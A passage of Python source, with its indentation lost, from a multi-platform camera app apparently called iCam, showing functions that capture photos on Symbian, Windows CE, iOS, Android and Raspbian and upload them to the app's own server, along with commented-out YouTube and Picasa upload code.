new_playlist_description=playlistDescription,
playlist_private=True, username="default")
# return playlistDescription
if False:
# It seems this info is not used!
aVideoTitle = ""
# It seems this info is not used!
aVideoDescription = ""
playlistURI = playlistToUse.feed_link[0].href
# time.sleep(10) #!!!!!!!!Maybe required
response = youtubeClient.AddPlaylistVideoEntryToPlaylist(
playlistURI, "!!!!", #newVideoEntry.id.text.split("/")[-1],
aVideoTitle, aVideoDescription)
except:
#newVideoEntry = youtubeClient.InsertVideoEntry(videoEntry,
# pathFileName)
DebugPrintErrorTrace()
DebugPrint("Exiting SendAlarmMessageToYouTubePlaylist() at %s." % \
GetCurrentDateTimeStringWithMilliseconds())
"""
def CreateAlarmPicasaAlbum():
if picasaClientAlreadyConnected == False:
if gdataModulesImported == False:
ImportGdataModules()
ConnectToPicasaGData()
try:
albumTitle = deviceId + ": " + time.strftime("%Y-%m-%d", crtTime) + \
(", %d" % cameraId)
iCamAlbumFound = False
# From
# https://code.google.com/apis/picasaweb/docs/1.0/developers_guide_python.html#ListAlbums
# (less important: https://code.google.com/apis/picasaweb/docs/2.0/developers_guide_protocol.html#ListAlbums)
# albumsFeed = picasaClient.GetUserFeed(kind = "album", user = "ender123")
albumsFeed = picasaClient.GetUserFeed(kind = "album")
# # IMPORTANT NOTE: it does not print the album list - I believe
# # BECAUSE THE tostring() METHOD DOESN'T DUMP THE ALBUMS LIST :))
#DebugPrint("albumsFeed = %s" % str(albumsFeed))
for album in albumsFeed.entry:
DebugPrint("Title: %s, number of photos: %s, id: %s" % \
(album.title.text, album.numphotos.text,
album.gphoto_id.text))
#picasaClient.Delete(album)
if album.title.text == albumTitle:
iCamAlbumFound = True
break
if iCamAlbumFound == True:
#print "Found"
iCamAlbum = album
else:
#print "Not found"
#!!!!IMPORTANT: Unfortunately this private argument gets translated
# in Picasa in the attribute Visibility - "Anyone with the link".
# Currently to fix this, the user has to go on Picasa and edit the
# attribute manually.
# Find a programatic solution...!!!!
iCamAlbum = picasaClient.InsertAlbum(title = albumTitle,
summary = "iCam photo album.",
location = "Bucharest",
access = "private")
except:
DebugPrintErrorTrace()
"""
def GetLatestPhoto(anExtension=".jpg"):
global lastResultGetLatestPhoto
try:
# For Android, GetCurrentDateTime() .
crtTime = time.localtime()
crtLOCAL_FOLDER_MEDIA_FILES = LOCAL_FOLDER_MEDIA_FILES + "/" + \
"%04d_%02d_%02d_%02d" % (crtTime.tm_year, crtTime.tm_mon,
crtTime.tm_mday, crtTime.tm_hour)
"""
DebugPrint("crtLOCAL_FOLDER_MEDIA_FILES = %s" % \
crtLOCAL_FOLDER_MEDIA_FILES)
"""
#crtTime2 = GetTime()
# See http://discussion.forum.nokia.com/forum/showthread.php?116978-What-is-the-time-granularity-in-Pys60 .
#numMilliseconds = (crtTime2 - int(crtTime2)) * 1000
#crtTime.tm_year, crtTime.tm_mon, crtTime.tm_mday, crtTime.tm_hour,
# crtTime.tm_min, crtTime.tm_sec, numMilliseconds
folderContent = os.listdir(crtLOCAL_FOLDER_MEDIA_FILES)
"""
Put in sortedFolderContent only the filenames for the folderContent
that don't have the extension anExtension.
"""
sortedFolderContent = []
for elem in folderContent:
if str.lower(elem).find(anExtension) != -1:
# print "%s doesn't contain anExtension" % elem
# folderContent = folderContent.remove(elem)
# folderContent.remove(elem)
sortedFolderContent.append(elem)
"""
Use reverse = False to send first the oldest ones (like this you send
in chronological order). Use reverse = True for sending first the
most recent ones.
"""
# sortedFolderContent = sorted(folderContent, reverse = False)
"""
sort() without parameters is the ONLY one that works in
Python 2.2.
(Info on sort at http://wiki.python.org/moin/HowTo/Sorting/.)
"""
sortedFolderContent.sort()
# sortedFolderContent = folderContent
# """
"""
DebugPrint("VideoRecordAndUpload(): sortedFolderContent = %s." % \
sortedFolderContent)
"""
DebugPrint("GetLatestPhoto(): sortedFolderContent = %s\n" % \
str(sortedFolderContent) + \
"GetLatestPhoto(): " \
"sortedFolderContent[len(sortedFolderContent) - 1] = %s" % \
sortedFolderContent[len(sortedFolderContent) - 1])
# """
#if len(sortedFolderContent) < 1:
if len(sortedFolderContent) < 2:
#if sortedFolderContent != []:
return None
if False:
#actualFileName = sortedFolderContent[len(sortedFolderContent) - 1]
actualFileName = sortedFolderContent[len(sortedFolderContent) - 1]
photoPathFileName = crtLOCAL_FOLDER_MEDIA_FILES + "/" + actualFileName
resultGetLatestPhoto = (actualFileName, photoPathFileName)
if lastResultGetLatestPhoto == resultGetLatestPhoto:
return None
else:
lastResultGetLatestPhoto = resultGetLatestPhoto
"""
# We have a new photo - so we call the alarm phone.
#From https://code.google.com/p/android-scripting/wiki/ApiReference#phoneCall
phoneCall(String uri)
#From https://code.google.com/p/android-scripting/wiki/ApiReference#smsSend
smsSend(String destinationAddress:
typically a phone number, String text)
Sends an SMS.
if ANDROID_OS:
myDroid.phoneCall("tel:" + ALARM_PHONE_NUMBER)
#myDroid.smsSend("tel:+01234567890", "Max 160 chars I guess")
"""
SendAlarmMessageToYouTubePlaylist(actualFileName)
if False:
if GetCurrentDateTimeStringWithMilliseconds().startswith(
"2012_09_02_17"):
myDroid.smsSend(ALARM_SMS_PHONE_NUMBER,
"Houston, we've got ack.")
return resultGetLatestPhoto
except:
DebugPrintErrorTrace()
def TakePhotoAndUpload_S60(cameraId, photoFileName, \
photoPathFileName):
global accessPointName
global LOCAL_FOLDER_MEDIA_FILES, bluetoothMode
global flashStr, exposureStr, whiteBalanceStr
global orientationForThisPhoneModel
global digitalZoom, flashIndex, exposureIndex, whiteBalanceIndex
if (cameraId == 0) and (orientationForThisPhoneModel == "landscape"):
# (phoneModel in ["Nokia6120", "NokiaN95", "NokiaN82"])):
"""
We give reset_inactivity() in order to turn the display on in
order for the cellphone to capture at maximum (angular) view,
at the maximum resolution.
"""
e32.reset_inactivity()
SetUIOrientation(cameraId, True)
e32.ao_sleep(1)
"""
Unfortunately it doesn't help: even if the viewfinder controls well
the exposure, etc, the photo taken is still with its own
settings, independent of the viewfinder.
On models with shutter like N95, N82, etc, it is better to start
the VF, in order to avoid taking photos over-exposed, etc - it
seems the viewfinder allows to control automatically the photo
params.
"""
if startViewfinderBeforeTakingPhoto:
# and (phoneModel in ["NokiaN95", "NokiaN82"])):
# if startViewfinderBeforeTakingPhoto or (not startAutomatically):
StartViewFinderForCamera(cameraId, True, True)
# With the backlight on (param True).
e32.ao_sleep(3)
# e32.ao_yield()
e32.reset_inactivity()
"""
UploadText("Taking photo: cameraId = %d, resolution = %d x %d, " \
"zoom = %d. JPEG quality = %d." \
% (cameraId, photoResolutionStr[photoResolutionIndex][1][0],
photoResolutionStr[photoResolutionIndex][1][1],
digitalZoom, photoQuality), ICAM_SERVER_NAME,
WEBPAGE_UL_GZIPPED_TEXT)
"""
"""
From S60 Module Reference, Release 2.0.0 final:
take_photo([mode,
size,
zoom,
flash,
exposure,
white balance,
position])
"""
try:
"""
camera.take_photo('RGB',
photoResolutionStr[photoResolutionIndex][1], digitalZoom,
'none', 'auto', 'auto', cameraId)
pic = camera.take_photo('RGB', localPhotoResolution[cameraId],
digitalZoom, 'none', 'auto', 'auto', cameraId)
"""
# Take the picture with cameraId.
pic = camera.take_photo(
photoModeStr[photoModeIndex[cameraId]][1],
localPhotoResolution[cameraId],
digitalZoom,
flashStr[flashIndex][1],
exposureStr[exposureIndex[cameraId]][1],
whiteBalanceStr[whiteBalanceIndex[cameraId]][1],
cameraId
)
if phoneModel in ["NokiaN95", "NokiaN82"]:
"""
# In order to close the shutter immediately after taking
# the photo.
camera.release()
#camera._my_camera = camera._camera.Camera(cameraId)
camera.UseCamera(cameraId)
"""
GeneralUseCameraS60(cameraId)
except:
pic = None
(exceptionType, exceptionValue, exceptionTraceback) = \
sys.exc_info()
# traceback.print_exc()
errorStr = "TakePhotoAndUpload_S60(%d): camera.take_photo for " \
"photoFileName = %s, localPhotoResolution = %s, " \
"free_ram = %d returned exception %s. Bailing out..." % \
(cameraId, photoFileName,
localPhotoResolution[cameraId], GetFreeRAM(),
repr(traceback.format_tb(exceptionTraceback)))
"""
UploadGZippedData(deviceId,
"Exception in TakePhotoAndUpload(%d)" \
" with photoFileName = %s: camera.take_photo" \
" - details: localPhotoResolution = %s, " \
"free_ram = %d. %s. Bailing out...\n" \
% (cameraId, photoFileName,
localPhotoResolution[cameraId],
GetFreeRAM(),
repr(traceback.format_tb(exceptionTraceback))),
ICAM_SERVER_NAME, WEBPAGE_UL_GZIPPED_TEXT, None)
"""
if MY_DEBUG_UPLOAD_MSG:
UploadGZippedData(deviceId, errorStr, ICAM_SERVER_NAME,
WEBPAGE_UL_GZIPPED_TEXT, None)
DebugPrint(errorStr)
DebugPrintErrorTrace()
if MY_DEBUG_STDERR_2:
sys.stderr.write(" " + errorStr + "\n")
sys.stderr.flush()
return
"""
save(filename[, callback=None, format=None, quality=75, bpp=24,
compression='default' ])
"""
try:
# Save the photo (as JPEG) with photoQuality
#pic.save(photoPathFileName, quality = photoQuality)
if photoModeStr[photoModeIndex[cameraId]][1] == "JPEG_Exif":
"""
In "JPEG_Exif" mode take_photo returns the JPEG file to be
saved, and not a photo, so it needs to be saved directly
to the disk and then reloaded in a graphics.Image object.
"""
fOutput = open(photoPathFileName, "wb")
fOutput.write(pic)
# fOutput.flush()
fOutput.close()
# return
DebugPrint("Saved JPEG data object received directly from " \
"the hardware, without calling pic.save().")
if not MODE_FOR_PHONE_WITH_LITTLE_RAM_AND_UNRELIABLE_MEM_CARD:
"""
Requires backslashes, otherwise graphics.Image.open
gives exception: SymbianError: [Errno -28] KErrBadName
"""
photoPathFileNameWithBackslashes = \
photoPathFileName.replace("/", "\\")
"""
We assign None to reassign it, IF necessary, the
Image.open(photoPathFileNameWithBackslashes).
"""
pic = None
else:
# Assuming RGB (RGB24)
"""
save(filename[, callback=None, format=None, quality=75, bpp=24,
compression='default' ])
"""
"""
if storeLocallyMedia == 1:
# Save the photo (as JPEG) with max quality (100%) locally.
pic.save(photoPathFileName, None, None, 100)
# Requires backslashes, otherwise pic.save gives exception:
# SymbianError: [Errno -28] KErrBadName
"""
photoPathFileNameWithBackslashes = \
photoPathFileName.replace("/", "\\")
# Save the photo (as JPEG) with maximum quality (100%) locally.
pic.save(photoPathFileNameWithBackslashes, None, None, 100)
"""
if (accessPointName == u"") and (bluetoothMode != 2):
DebugPrint("TakePhotoAndUpload(): Not uploading photo.")
#In order to save the state on the memory card, we call
# UploadStateAndFileAndStoreState:
#UploadStateAndFileAndStoreState(None, cameraId,
# crtTime.tm_year, crtTime.tm_mon, crtTime.tm_mday,
# crtTime.tm_hour, crtTime.tm_min, crtTime.tm_sec,
# None, ICAM_SERVER_NAME, WEBPAGE_UL_GZIPPED_STATE_AND_FILE)
return
"""
except IOError:
DebugPrint("TakePhotoAndUpload_S60(%d): pic.save returned IOError " \
"exception when saving %s." % \
(cameraId, photoFileName))
DebugPrintErrorTrace()
except:
# traceback.print_exc()
(exceptionType, exceptionValue, exceptionTraceback) = \
sys.exc_info()
errorStr = "TakePhotoAndUpload_S60(%d): while saving " \
"photoPathFileName = %s; free_ram = %d, returned " \
"exception %s. Bailing out..." % \
(cameraId, photoPathFileName, GetFreeRAM(),
repr(traceback.format_tb(exceptionTraceback)))
if MY_DEBUG_UPLOAD_MSG:
UploadGZippedData(deviceId, errorStr, ICAM_SERVER_NAME,
WEBPAGE_UL_GZIPPED_TEXT, None)
DebugPrint(errorStr)
if MY_DEBUG_STDERR:
traceback.print_exc()
sys.stderr.write(" " + errorStr + "\n")
sys.stderr.flush()
return
if (photoResolutionStr[photoResolutionIndex][1][0] == 0) and \
(photoResolutionStr[photoResolutionIndex][1][1] == 0):
"""
A resolution of (0, 0) means we do not upload the photo
to the server.
"""
pass
else:
"""
We check if we specified that the uploaded photo has the same
res as the local one
(photoResolutionStr[photoResolutionIndex][1] = (-1, -1)
or that the width of the photo saved locally is smaller than
the width of the photo we want to send over the Internet, in
which case we send the local photo non-resized.
"""
if (photoResolutionStr[photoResolutionIndex][1][0] == -1) and \
(photoResolutionStr[photoResolutionIndex][1][1] == -1) or \
(localPhotoResolution[cameraId][0] <= \
photoResolutionStr[photoResolutionIndex][1][0]):
"""
We check after the width of the photo.
!!!!we do not check also after the height, i.e.,
localPhotoResolution[cameraId][1].
"""
photoResizedPathFileName = photoPathFileName
picResized = pic #!!!!TODO: probably not necessary --> remove
DebugPrint("TakePhotoAndUpload_S60: Not resizing photo since the "\
"desired resolution of the sent photo is " \
"greater or equal to the local resolution.")
else:
if pic == None:
pic = graphics.Image.open(
photoPathFileNameWithBackslashes)
"""
Since photoResizedPathFileName is "temp.jpg" we do
not unlink it.
"""
photoResizedPathFileName = LOCAL_FOLDER_MEDIA_FILES + \
"/temp.jpg"
DebugPrint("TakePhotoAndUpload_S60(%d) with photoFileName = %s: " \
"pic.resize to (%d, %d)." % \
(cameraId, photoFileName,
photoResolutionStr[photoResolutionIndex][1][0],
photoResolutionStr[photoResolutionIndex][1][1]))
try:
"""
From PyS60 2.0 documentation:
resize(newsize[, callback=None, keepaspect=0 ]);
size is a two-element tuple .
"""
picResized = \
pic.resize(photoResolutionStr[photoResolutionIndex][1])
except:
"""
We do this in order to force the garbage collection - but,
it doesn't really work it seems...
"""
pic = None
picResized = None
# del pic
# import gc
# gc.collect() #does not work in PyS60 1.4.5
(exceptionType, exceptionValue, exceptionTraceback) = \
sys.exc_info()
errorStr = "TakePhotoAndUpload_S60(%d): pic.resize with " \
"photoFileName = %s (free_ram = %d) " \
"returned exception: " \
"exceptionTraceback = %s, " \
"exceptionType = %s, exceptionValue = %s. " \
"Bailing out..." % \
(cameraId, photoFileName, GetFreeRAM(),
repr(traceback.format_tb(exceptionTraceback)),
str(exceptionType),
str(exceptionValue))
if MY_DEBUG_UPLOAD_MSG:
"""
UploadGZippedData(deviceId,
"Exception in TakePhotoAndUpload(%d) with " \
"photoFileName = %s: pic.resize - details: " \
"free_ram = %d. %s.\n" % \
(cameraId, photoFileName, GetFreeRAM(),
repr(traceback.format_tb(exceptionTraceback)) ),
ICAM_SERVER_NAME, WEBPAGE_UL_GZIPPED_TEXT, None)
"""
UploadGZippedData(deviceId, errorStr, ICAM_SERVER_NAME,
WEBPAGE_UL_GZIPPED_TEXT, None)
DebugPrint(errorStr)
if MY_DEBUG_STDERR:
sys.stderr.write(" " + errorStr + "\n")
DebugPrintErrorTrace()
return
"""
From PyS60 2.0 documentation:
transpose(direction[, callback=None ])
"""
try:
# save(filename [,
# callback=None,
# format=None,
# quality=75,
# bpp=24, compression="default"])
"""
Requires backslashes, otherwise pic.save gives exception:
SymbianError: [Errno -28] KErrBadName
"""
photoResizedPathFileNameWithBackslashes = \
photoResizedPathFileName.replace("/", "\\")
# Save the photo (as JPEG) with photoQuality.
picResized.save(photoResizedPathFileNameWithBackslashes,
None, None, photoQuality)
except IOError:
DebugPrint("TakePhotoAndUpload_S60(%d): picResized.save " \
"returned exception IOError when saving %s. " \
"Bailing out..." % (cameraId, photoFileName))
return
except:
(exceptionType, exceptionValue, exceptionTraceback) = \
sys.exc_info()
# traceback.print_exc()
errorStr = "TakePhotoAndUpload_S60(%d): picResized.save " \
"when saving photoFileName = %s " \
"(free_ram = %d) returned exception %s. " \
"Bailing out..." % \
(cameraId, photoFileName, GetFreeRAM(),
repr(traceback.format_tb(exceptionTraceback)))
if MY_DEBUG_UPLOAD_MSG:
UploadGZippedData(deviceId, errorStr,
ICAM_SERVER_NAME,
WEBPAGE_UL_GZIPPED_TEXT, None)
DebugPrint(errorStr)
if MY_DEBUG_STDERR:
sys.stderr.write(" " + errorStr + "\n")
DebugPrintErrorTrace()
return
if uploadMediaToIQEngines:
if (photoResolutionStr[photoResolutionIndex][1][0] == -1) and \
(photoResolutionStr[photoResolutionIndex][1][1] == -1) and \
(localPhotoResolution[cameraId][0] <= 640):
"""
We can upload to IQEngines only photos of maximum
(640, 480) resolution.
"""
IQEnginesPhotoUpload(photoResizedPathFileName)
try:
res = UploadStateAndFileAndStoreState(deviceId, cameraId,
photoFileName, photoResizedPathFileName,
ICAM_SERVER_NAME, WEBPAGE_UL_GZIPPED_STATE_AND_FILE,
singleThreaded=False
)
except:
DebugPrintErrorTrace()
def TakePhotoAndUpload_WinCE(cameraId, photoFileName, \
photoPathFileName):
#photoFileName = None
#photoPathFileName = None
try:
# "/photo.jpg"
OUTPUT_PHOTO_PATH_FILENAME = LOCAL_FOLDER + "/photo.bmp"
"""
If photoFileName and photoPathFileName is a .jpg and
OUTPUT_PHOTO_PATH_FILENAME is a .bmp then we should make the
first also a .bmp, etc.
"""
photoFileName = photoFileName[:len(photoFileName) - 4] + \
OUTPUT_PHOTO_PATH_FILENAME[len(OUTPUT_PHOTO_PATH_FILENAME) - 4:]
photoPathFileName = \
photoPathFileName[:len(photoPathFileName) - 4] + \
OUTPUT_PHOTO_PATH_FILENAME[len(OUTPUT_PHOTO_PATH_FILENAME) - 4:]
# Requires backslashes?
OUTPUT_PHOTO_PATH_FILENAMEWithBackslashes = \
OUTPUT_PHOTO_PATH_FILENAME.replace("/", "\\")
"""
Requires backslashes, otherwise pic.save gives exception:
SymbianError: [Errno -28] KErrBadName
"""
photoPathFileNameWithBackslashes = \
photoPathFileName.replace("/", "\\")
if os.path.isfile(OUTPUT_PHOTO_PATH_FILENAME):
os.unlink(OUTPUT_PHOTO_PATH_FILENAME)
#WinSpawn(r"\Storage Card\iCam_WinMobile\CameraCapture.exe", [])
#WinSpawn(r"\Storage Card\iCam\CameraCapture.exe", [])
#WinSpawn(r"\Storage Card\iCam\take_photo_320_240_bmp_and_exit.exe", [])
tmpPathFileName = LOCAL_FOLDER + "/take_photo_320_240_bmp_and_exit.exe"
# I think we require backslashes.
tmpPathFileNameWithBackslashes = tmpPathFileName.replace("/", "\\")
WinSpawn(tmpPathFileNameWithBackslashes, [])
"""
We give this to allow saving completely the media file to the
disk - but maybe it is not effective.
"""
time.sleep(5.0)
# SleepAndPetWatchdog(5.0, False)
DebugPrint("TakePhotoAndUpload_WinCE(%d): photoFileName = %s, " \
"photoPathFileNameWithBackslashes = %s, " \
"OUTPUT_PHOTO_PATH_FILENAMEWithBackslashes = %s." \
% (cameraId, photoFileName,
photoPathFileNameWithBackslashes,
OUTPUT_PHOTO_PATH_FILENAMEWithBackslashes))
"""
Gives often exception:
"WindowsError: [Error 28] There is not enough space on the disk" .
"""
#os.rename(OUTPUT_PHOTO_PATH_FILENAMEWithBackslashes,
# photoPathFileNameWithBackslashes)
"""
Traceback (most recent call last):
File "\Storage Card\iCam\iCam.py", line 2510, in CopyFile
dstFile = open(dstFileName, "wb")
IOError: [Errno 2] The system cannot find the file specified:
'\\Storage Card\\iCam\\Media\\2011_04_26_13_20_19_000_0.bmp'.
"""
#CopyFile(OUTPUT_PHOTO_PATH_FILENAMEWithBackslashes,
# photoPathFileNameWithBackslashes)
"""
However, I am able to erase OUTPUT_PHOTO_PATH_FILENAME in the next
call TakePhoto...() - does this mean I need more than 5
seconds for the file to be written to disk?
"""
#res = UploadStateAndFileAndStoreState(deviceId, cameraId,
# photoFileName, photoPathFileName, ICAM_SERVER_NAME,
# WEBPAGE_UL_GZIPPED_STATE_AND_FILE)
res = UploadStateAndFileAndStoreState(deviceId, cameraId,
photoFileName, OUTPUT_PHOTO_PATH_FILENAMEWithBackslashes,
ICAM_SERVER_NAME, WEBPAGE_UL_GZIPPED_STATE_AND_FILE,
singleThreaded=True)
except:
# return
DebugPrintErrorTrace()
return (photoFileName, photoPathFileName)
lastiOSTakePicturePhotoPathFileName = None
def TakePhotoAndUpload_iOS(cameraId, photoFileName, \
photoPathFileName):
try:
"""
#From http://www.telesphoreo.org/pipermail/iphone-python/2008-September/000126.html
"This is actually fairly simple with the PhotoLibrary
framework. I don't know how to do it offhand, but it
pretty much has messages for "take a picture to disk". -J"
"UIImagePickerController doesn't let you take a picture and
save it to disk, AFAIK it only lets you ask the user to
choose a picture and optionally take one instead. -J"
http://forums.macrumors.com/showthread.php?t=462326
Reference to https://code.google.com/p/iflickr/source/browse/trunk/bkp/PhotoLibrary.h?r=10
"i dont know if this is what you mean but i was able to get
the same video ability as on the normal unjailbroken 3gs
on my 3g by copying the photolibrary.framework file folder
from a 3gs and paste it on my 3g at
/var/system/library/privateframeworks.
im sure you can figure something out by knowing this "
Camera APIs
http://forums.macrumors.com/showthread.php?t=462326
- unofficial camera APIs
http://developer.apple.com/library/ios/#documentation/UIKit/Reference/UIImagePickerController_Class/UIImagePickerController/UIImagePickerController.html
"Check which media types are available, for the source
type youre using, by calling the
availableMediaTypesForSourceType: class method.
This lets you distinguish between a camera that can be
used for video recording and one that can be used only
for still images."
http://developer.apple.com/library/ios/#documentation/AudioVideo/Conceptual/CameraAndPhotoLib_TopicsForIOS/Introduction/Introduction.html#//apple_ref/doc/uid/TP40010400
http://developer.apple.com/library/ios/#documentation/AudioVideo/Conceptual/AVFoundationPG/Articles/00_Introduction.html#//apple_ref/doc/uid/TP40010188-CH1-SW10
"""
"""
!!!! Use lock/mutex to synchronize with the takePicture "loop".
"""
# cameraCapturePicture(photoPathFileName)
# time.sleep(5.0) #Wait a bit to make sure the photo gets saved.
# SleepAndPetWatchdog(5.0, False)
if lastiOSTakePicturePhotoPathFileName is None:
DebugPrint("TakePhotoAndUpload_iOS(%d): " \
"lastiOSTakePicturePhotoPathFileName is None " \
"--> bailing out." % cameraId)
return
photoPathFileName = lastiOSTakePicturePhotoPathFileName
photoFileName = os.path.basename(photoPathFileName)
res = UploadStateAndFileAndStoreState(deviceId, cameraId,
photoFileName, photoPathFileName,
ICAM_SERVER_NAME, WEBPAGE_UL_GZIPPED_STATE_AND_FILE,
singleThreaded=True
)
except:
DebugPrintErrorTrace()
return (photoFileName, photoPathFileName)
def TakePhotoAndUpload_Android(cameraId, photoFileName, \
photoPathFileName):
DebugPrint("TakePhotoAndUpload_Android(%d): photoFileName = %s, " \
"photoPathFileName = %s." % \
(cameraId, photoFileName, photoPathFileName))
try:
#!!!!TODO: I can use here MobileWebCam, as well
RELY_ON_RUBY_SCRIPT_ICAMTEST = False
if RELY_ON_RUBY_SCRIPT_ICAMTEST:
# This checks for photos made with the ruby script iCamTest.rb .
myResPhoto = GetLatestPhoto(".jpg")
#!!!!TODO: update photoFileName and photoPathFileName and return them to the caller
if myResPhoto is not None:
res = UploadStateAndFileAndStoreState(deviceId, cameraId,
myResPhoto[0], myResPhoto[1],
ICAM_SERVER_NAME, WEBPAGE_UL_GZIPPED_STATE_AND_FILE,
singleThreaded=True
)
else:
try:
"""
This starts the ViewFinder (and then stops it and comes back
to the old view - the Welcome view).
Note: while the Viewfinder is ON the UI submenu is no
longer available.
"""
myDroid.cameraCapturePicture(photoPathFileName)
# Wait a bit to make sure the photo gets saved.
# time.sleep(5.0)
SleepAndPetWatchdog(5.0, False)
res = UploadStateAndFileAndStoreState(deviceId, cameraId,
photoFileName, photoPathFileName,
ICAM_SERVER_NAME, WEBPAGE_UL_GZIPPED_STATE_AND_FILE,
singleThreaded=True
)
except:
DebugPrintErrorTrace()
except:
DebugPrintErrorTrace()
if RASPBIAN_OS:
import subprocess
def TakePhotoAndUpload_Raspbian(cameraId, photoFileName, \
photoPathFileName):
DebugPrint("TakePhotoAndUpload_Raspbian(%d): photoFileName = %s, " \
"photoPathFileName = %s." % \
(cameraId, photoFileName, photoPathFileName))
if True:
# We put the photo in a different folder for each day
try:
crtLOCAL_FOLDER_MEDIA_FILES = LOCAL_FOLDER_MEDIA_FILES + "/" + \
time.strftime("%Y_%m_%d", GetCurrentDateTime())
if not os.path.exists(crtLOCAL_FOLDER_MEDIA_FILES):
os.makedirs(crtLOCAL_FOLDER_MEDIA_FILES)
photoPathFileName = crtLOCAL_FOLDER_MEDIA_FILES + "/" + \
photoFileName
except:
DebugPrintErrorTrace()
try:
#!!!!TODO: use cameraId
myId = 0
#CAM_TL = "fswebcam -d /dev/video%d -r 320x240 --no-timestamp --no-banner" % myId
CAM_TL = "fswebcam -d /dev/video%d -r 320x240" % myId
#fileNameTstamp = "TL" + timestampAlex() + ("_%05d.jpg" % index)
cmd = CAM_TL + " " + photoPathFileName #fileNameTstamp
try:
#print("Run:" + cmd)
subprocess.call([cmd], shell=True)
except:
DebugPrintErrorTrace()
# Wait a bit to make sure the photo gets saved.
# time.sleep(5.0)
SleepAndPetWatchdog(5.0, False)
res = UploadStateAndFileAndStoreState(deviceId, cameraId,
photoFileName, photoPathFileName,
ICAM_SERVER_NAME, WEBPAGE_UL_GZIPPED_STATE_AND_FILE,
singleThreaded=True
)
except:
DebugPrintErrorTrace()
"""
!!!!TODO: The code is stuffy with all the platforms - maybe split it.
But do not bother to reorganize it much otherwise (for example, it
is rather OK the fact each OS platform call its own
UploadStateAndFileAndStoreState()
Take photo at specified resolution, save it and scale it to the desired
resolution and send it.
"""
def TakePhotoAndUpload(cameraId):
global photoModeStr, localPhotoResolution
global deviceId
global photoModeIndex
GetGSMLocation()
# t = datetime.datetime.now()
"""
See http://pleac.sourceforge.net/pleac_python/datesandtimes.html and
http://docs.python.org/library/time.html#time.strftime for details.
"""
# photoFileName = t.strftime("%Y_%m_%d_%H_%M_%S.jpg")
"""
crtTime = GetCurrentDateTime()
photoFileName = time.strftime("%Y_%m_%d_%H_%M_%S", crtTime) + \
("_%d.png" % cameraId)
# RGB24
photoModeIndex[0] = 2
"""
photoFileName = GetCurrentDateTimeStringWithMilliseconds() + \
"_%s_%d.jpg" % (deviceId, cameraId)
#"_%d.jpg" % cameraId
"""
photoFileName = time.strftime("%Y_%m_%d_%H_%M_%S", crtTime) + \
("_%d.jpg" % cameraId)
"""
if storeLocallyMedia == 0:
if ANDROID_OS:
photoPathFileName = LOCAL_FOLDER_MEDIA_FILES + "/" + photoFileName
elif SYMBIAN_OS:
"""
Since we don't want to store the file, we save it in the RAM drive.
# photoPathFileName = "D:/iCamTemp.jpg"
Since we don't want to store the file, we save it in the RAM drive.
"""
photoPathFileName = LOCAL_FOLDER_TEMP + "/iCamTemp.jpg"
elif WINDOWS_CE_OS_PYTHONCE:
photoPathFileName = LOCAL_FOLDER_MEDIA_FILES + "/" + photoFileName
else:
photoPathFileName = LOCAL_FOLDER_MEDIA_FILES + "/" + photoFileName
myText = "TakePhotoAndUpload(%d) with photoPathFileName = %s: " \
"localPhotoResolution[cameraId] = %s, " \
"photoMode[cameraId] = %s. " % \
(cameraId, photoPathFileName,
str(localPhotoResolution[cameraId]),
photoModeStr[photoModeIndex[cameraId]][1])
myText += GetTextForState(cameraId)
DebugPrint(myText)
if ANDROID_OS:
TakePhotoAndUpload_Android(cameraId, photoFileName, photoPathFileName)
elif SYMBIAN_S60_OS:
# elif SYMBIAN_OS:
TakePhotoAndUpload_S60(cameraId, photoFileName, photoPathFileName)
elif iOS_PYOBJC:
photoFileName, photoPathFileName = TakePhotoAndUpload_iOS(cameraId, \
photoFileName, photoPathFileName)
elif WINDOWS_CE_OS_PYTHONCE:
photoFileName, photoPathFileName = TakePhotoAndUpload_WinCE(cameraId, \
photoFileName, photoPathFileName)
elif RASPBIAN_OS:
TakePhotoAndUpload_Raspbian(cameraId, photoFileName, photoPathFileName)
if storeLocallyMedia == 0:
if ANDROID_OS:
DebugPrint("Since storeLocallyMedia == 0, now I SHOULD erase it.")
elif SYMBIAN_OS:
DebugPrint("Since storeLocallyMedia == 0, I saved the photo on " \
"D: and now I erase it.")
try:
if SYMBIAN_OS:
if _PyS60_1_9_OR_NEWER: #pyS60VersionNumber > 14:
mediaUploadedLock.wait()
os.unlink(photoPathFileName)
except:
DebugPrintErrorTrace()
if SYMBIAN_OS:
videoLock = e32.Ao_lock()
def VideoRecordCallback(errorCode, eventType):
if SYMBIAN_OS:
"""
IMPORTANT: From
http://library.forum.nokia.com/index.jsp?topic=/S60_5th_Edition_Cpp_Developers_Library/GUID-35228542-8C95-4849-A73F-2B4F082F0C44/sdk/doc_source/reference/reference-cpp/Multimedia_Framework/CVideoRecorderUtilityClass.html
CVideoRecorderUtility::Stop() (invoked by camera.stop_record()):
"Recording is stopped without sending the MvruoRecordComplete
message to the client."
ERecordComplete is not given by camera.stop_record()
Only time given when video recording was stopped probably by brutal
exit from app:
Exiting iCam at 11:47:58 09-03-2011 - command given from the
cellphone.
ContinuousVideoRecordAndUpload()::VideoCallback(): at
2011_03_09_11_48_13_190 we have errorCode = -18,
statusInfo = 4002.
Entered PetWatchdog() at 11:48:13 09-03-2011.
"""
"""
global control_light # what does this represent?!!!!
if statusInfo == camera.EPrepareComplete:
control_light = 1
"""
"""
//cameramodule.cpp
// A helper function for the implementation of callbacks
//from C/C++ code to Python callables (modified from appuifwmodule.cpp)
TInt TPyVidCallback::VideoCameraEvent(TInt aError, TInt aStatus)
{
PyGILState_STATE gstate = PyGILState_Ensure();
TInt error = KErrNone;
PyObject* arg = Py_BuildValue("(ii)", aError, aStatus);
...
}
//MvruoEvent defined in
//C:\Symbian\9.2\S60_3rd_FP1\Epoc32\include\videorecorder.h
//and in http://library.forum.nokia.com/index.jsp?topic=/S60_5th_Edition_Cpp_Developers_Library/GUID-35228542-8C95-4849-A73F-2B4F082F0C44/sdk/doc_source/reference/reference-cpp/Multimedia_Framework/MVideoRecorderUtilityObserverClass.html
//TMMFEvent defined in
//C:\Symbian\9.2\S60_3rd_FP1\Epoc32\include\mmf\common\mmfcontrollerframeworkbase.h:
//and in http://library.forum.nokia.com/index.jsp?topic=/S60_5th_Edition_Cpp_Developers_Library/GUID-35228542-8C95-4849-A73F-2B4F082F0C44/sdk/doc_source/reference/reference-cpp/Multimedia_Framework/TMMFEventClass.html
//See also "Symbian OS C++ for Mobile Phones", Volume 2, page 291:
"Synchronous or asynchronous communication of custom commands
to the video controller is supported in the same way as for the
video player utility. Custom callbacks are also supported by the
